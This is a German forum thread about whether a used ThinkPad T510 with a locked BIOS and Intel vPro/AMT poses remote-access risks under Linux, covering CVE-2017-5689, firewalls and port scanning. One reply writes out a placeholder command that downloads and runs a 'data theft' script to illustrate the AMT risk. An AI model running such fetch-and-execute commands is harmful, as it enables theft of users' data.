T510 Bios gesperrt bzw. nur Usermode - Sicherheitsrisiko bei Linux?

[rollohoch]

Hallo,
Bitte entschuldigt, falls die Frage etwas ungenau ist.
Es ist nur schwer sich einen Überblick zu verschaffen.
Ich habe ein Thinkpad T510, da ist das Bios-Passwort gesetzt und ich kann wenig ändern.
Booten von DVD oder Festplatte geht aber. Kann ich das unbedenklich mit Linux nutzen? Antitheft und "AT" (also der Punkt im Bios über AT) steht auf enabled/not activated. Oder sind über das Vpro (oder AMT? falls es das hat) zum Beispiel Zugriffe von außen möglich? Können da Tastatureingaben geloggt und verschickt werden? Oder der Festplatteninhalt?
Es ist ein T510 mit Intel-i5 vpro; Betriebssystem wäre Debian oder Ubuntu (bzw. Xubuntu).

Vielen Dank schonmal!
Grüße, rollohoch

Andeutung entfernt, Phil2009

 

[cuco]

Zunächst: Hilfe beim Umgehen des Passworts wird es hier im Forum nicht geben! Das nur als Hinweis, bevor dazu eine Frage oder Antworten kommen.

Antitheft enabled heißt nur, dass es zwar angeschaltet ist, aber das not activated heißt, dass es keine Lizenz dafür o.ä. gibt. AFAIK der Standardzustand. Über AMT sind Zugriffe von außen möglich, falls dieses aktiviert und provisioniert ist, aber das wird im Detail nicht im BIOS eingestellt. Und sofern du eine ganz normale Firewall davor hast, wie sie in jedem Router standardmäßig läuft, müsste der Angreifer schon im eigenen Netz sein. Und auch dann ist das kein Keylogger, sondern eine Fernsteuerung die durch einen bunten blinkenden Rahmen auf sich aufmerksam macht, dass sie gerade benutzt wird. Du würdest es also merken. Der Festplatteninhalt kann darüber gar nicht verschickt werden.

Kurzschließen der Kontakte am Chip ist keine Lösung! Dann wird hinterher das Supervisor-Passwort abgefragt und da du dass ja offenbar nicht hast, hast du hinterher einen unbenutzbaren Briefbeschwerer.

Tipp: Frag' den Vorbesitzer nach dem Kennwort. Dann erübrigt sich das ganze.

 

[rollohoch]

Hallo cuco,

Danke für die ausführliche Antwort!

Der Vorbesitzer weiß es wohl auch nicht. Ich habe den als defekt gekauft, aber festgestellt, dass er startet. Der Verkäufer hat sich auf Nachfrage bisher leider nicht gemeldet.
Aber das bedeutet also, wenn ich den Laptop ganz normal an einer Fritzbox oder Kabelbox zum Beispiel habe, kann normal nichts passieren?
Nur eine Frage zum Verständnis: Auf welcher Ebene läuft denn diese AMT? Braucht es dazu nicht zwingend ein installiertes Windows?

Grüße,
rollohoch

 

[hikaru]

AMT läuft auf der Intel Managment Engine (also noch unterhalb des BIOS) und ist dank CVE-2017-5689 offen wie ein Scheunentor. Was da für ein Betriebssystem auf dem Rechner läuft ist völlig egal.
Da es bei dir "enabled" ist, ist dein Rechner prinzipiell angreifbar. Was "not activated" technisch im Detail bedeutet weiß ich nicht. Falls es sich dabei lediglich um die Authentifizierung handelt, dann ist es genau das was CVE-2017-5689 aushebelt. Der Schalter würde dann im Ernstfall genau gar keinen Unterschied machen.
Eine Firewall außerhalb des Rechners(!) würde helfen, wenn sie weiß welche Pakete sie blockieren muss. Abgesehen davon würde ich mich nicht darauf verlassen, dass sich ein übernommenes AMT durch buntes Geblinke oder sonstige Anzeichen bemerkbar macht. Das ist Black-Box-Software mit vollem Hardwarezugriff und keiner kann dir sagen wie sie genau arbeitet. Keylogger, Datentransfers, alles möglich, wenn auch nicht unbedingt wahrscheinlich.

 

[zwieblum]

Mach' einen Portscan bei dem Gerät, dann siehst du ob irgend ein Server läuft, den du nicht kennst. Hatte mal ein T500, da hab' ich einige male mit den BIOS-Settings spielen müssen bis die ATM verstummt ist.

 

[fishmac]

Und sofern du eine ganz normale Firewall davor hast, wie sie in jedem Router standardmäßig läuft, müsste der Angreifer schon im eigenen Netz sein.

Vielleicht ist er auch mal außerhalb seines (W)LANs unterwegs...?

Und auch dann ist das kein Keylogger, sondern eine Fernsteuerung die durch einen bunten blinkenden Rahmen auf sich aufmerksam macht, dass sie gerade benutzt wird. Du würdest es also merken. Der Festplatteninhalt kann darüber gar nicht verschickt werden.

Da wäre zunächst mal zu überprüfen, ob das BIOS original - also unmodifiziert - ist.
Warum sollte es nicht möglich sein Teile des Inhalts der HDD/SSD zu verschicken oder zu modifizieren?

Kurzschließen der Kontakte am Chip ist keine Lösung! Dann wird hinterher das Supervisor-Passwort abgefragt und da du dass ja offenbar nicht hast, hast du hinterher einen unbenutzbaren Briefbeschwerer.

Ich würde das Teil ohnehin einschicken.

Tipp: Frag' den Vorbesitzer nach dem Kennwort. Dann erübrigt sich das ganze.

Hat er schon und der Antwort nach würde ich erstmal unauffällig die Seriennummer überprüfen lassen...

Mach' einen Portscan bei dem Gerät, dann siehst du ob irgend ein Server läuft, den du nicht kennst. Hatte mal ein T500, da hab' ich einige male mit den BIOS-Settings spielen müssen bis die ATM verstummt ist.

Welche Settings für den Portscan wären denn das?

Edit:
(gefunden):https://www.intel.de/content/www/de/de/privacy/intel-active-technology-vpro.html

 

[StefanW.]

Wenn man finanziell ganz knapp bei Kasse ist, dann kann man so ein Gerät nutzen. Ansonsten würde ich mir ein anderes Board oder Notebook kaufen.

 

[fishmac]

Würde mich mal interessieren wieviel der TopicStarter für das Gerät hingeblättert hat.

 

[andi.short]

Spätestens wenn die CMOS / BIOS Batterie alle ist und somit auch Datum und Zeit verloren sind, wird das ThinkPad nicht mehr laufen.

Daher wäre zudem die Frage, ob dieser Mangel (Passwort) beim Kauf bekannt war? Falls nein, Geld zurück oder Umtausch.

 

[cuco]

AMT
[...]Da es bei dir "enabled" ist, ist dein Rechner prinzipiell angreifbar. Was "not activated" technisch im Detail bedeutet weiß ich nicht.

Du verwechselst gerade Intels Active Management Technology (AMT) mit Intel Anti Theft (AT).

Eine Firewall außerhalb des Rechners(!) würde helfen, wenn sie weiß welche Pakete sie blockieren muss.

Standardkonfiguration einer Firewall ist, dass sie alle eingehenden Verbindungen blockiert, sofern nicht explizit als Ausnahme etwas definiert wurde. Dafür muss sie nicht wissen, was blockiert werden muss. Verbindungsaufbau kann dann nur von innen nach außen geschehen, Pakete von außen kommen nur dank connection tracking bei bereits aufgebauten Verbindungen durch. So lange das AMT nicht selbst Verbindungen nach außen aufbaut, kann von außen auch keiner drauf. Und wenn AMT Verbindungen nach außen aufbauen würde, hätten wir ganz andere Probleme

Vielleicht ist er auch mal außerhalb seines (W)LANs unterwegs...?

Guter Punkt! Dafür ist ein konfiguriertes AMT natürlich kacke...

Da wäre zunächst mal zu überprüfen, ob das BIOS original - also unmodifiziert - ist.

:blink: jetzt werden wir aber doch paranoid. Warum sollte das BIOS modifiziert sein? Und wenn es danach geht, müssten wir das bei jedem Gerät prüfen. Egal ob mit BIOS-Passwort oder ohne, egal ob gebraucht oder neu.

Warum sollte es nicht möglich sein Teile des Inhalts der HDD/SSD zu verschicken oder zu modifizieren?

Weil AMT dafür keine Funktion anbietet.

Hat er schon

Richtig, das hat er aber erst auf meine Nachfrage hin geschrieben.

 

[hikaru]

Du verwechselst gerade Intels Active Management Technology (AMT) mit Intel Anti Theft (AT).

Ja. Danke!
Bleibt die Frage: Ist AMT aktiv oder nicht? (Lässt sich das ohne BIOS-Passwort überhaupt herausfinden?) Falls nicht sicherzustellen ist, dass es deaktiviert ist, sollte der Rechner dringend zum Briefbeschwerer umfunktioniert werden.

Standardkonfiguration einer Firewall ist, dass sie alle eingehenden Verbindungen blockiert, sofern nicht explizit als Ausnahme etwas definiert wurde.

Wir wissen nicht in welchem Zustand eine hypothetische Firewall wäre. Um gegen AMT-Angriffe zu schützen müsste sie auf jeden Fall die entsprechenden Pakete blockieren. Ob sie das per White- oder Blacklist tut ist eher nebensächlich.

Weil AMT dafür keine Funktion anbietet.

Woher weißt du dass? Ich kenne den AMT-Code nicht. Prinzipiell bietet AMT Vollzugriff auf die Hardware. Zumindest bietet AMT KVM, womit sich jede lokale Eingabe remote absetzen lässt. Darüber lassen sich natürlich Datenträgerinhalte auslesen:

wget böses.script.zum.Datenklau && sh böses.script.zum.Datenklau

 

[StefanW.]

Daher wäre zudem die Frage, ob dieser Mangel (Passwort) beim Kauf bekannt war? Falls nein, Geld zurück oder Umtausch.

Hast Du den Aushangsbeitrag gelesen? Das Gerät wurde als DEFEKT verkauft.

 

[andi.short]

Das habe ich wohl, aber ein nicht erwähntes gesetztes Passwort ist für mich ein zusätzlicher Mängel, auch wenn ein Verkauf als 'defekt' jegliche Rücknahme auszuschließen versucht.

 

[rollohoch]

Hallo,
Vielen Dank für die große Rückmeldung! Das sind auf alle Fälle ein paar interessante Infos.
Den Laptop würde ich nur zu Hause verwenden, Desktopersatz und Test-/Übungsrechner für Linux oder so. Von daher ist das mit Portscan eine gute Idee. Mal sehen, ob ich das hinbekomme.

Würde mich mal interessieren wieviel der TopicStarter für das Gerät hingeblättert hat.

Den habe ich gewissermaßen geschenkt bekommen. Ich habe ein einwandfreies T520 gekauft, und diesen gab es als "defekt" dazu. Seriennummer prüfen ist vielleicht eine Idee, wenn das irgendwo schnell und einfach geht. Ansonsten denke ich, so einen 10 Jahre alten Laptop findet man (leider) auch mal im Schrott. Daher sehe ich das eher gelassen.

Grüße,
rollohoch

 

[boletusmaximus]

Das habe ich wohl, aber ein nicht erwähntes gesetztes Passwort ist für mich ein zusätzlicher Mängel, auch wenn ein Verkauf als 'defekt' jegliche Rücknahme auszuschließen versucht.

Da muss ich widersprechen .
Ein als defekt deklariertes und verkauftes Gerät schließt jeglichen Anspruch auf Funktionsfähigkeit aus.
Somit ist es reines Glück ob der erworbene Artikel ganz oder in Teilen funktioniert.
Das es überhaupt angeht ist also praktisch schon ein Bonus.

 

[rollohoch]

Das es überhaupt angeht ist also praktisch schon ein Bonus.

Ja, so sehe ich das auch. Es hat aber eine dedizierte Grafik, nicht die normale Intel. Ich habe dazu nichts gelesen, aber wenn die beim T510 manchmal Probleme macht (wie das ja bei manchen Laptops gelegentlich der Fall ist), kann es natürlich sein, dass er bei mir jetzt ein paar mal zufällig beim ersten Versuch angegangen ist..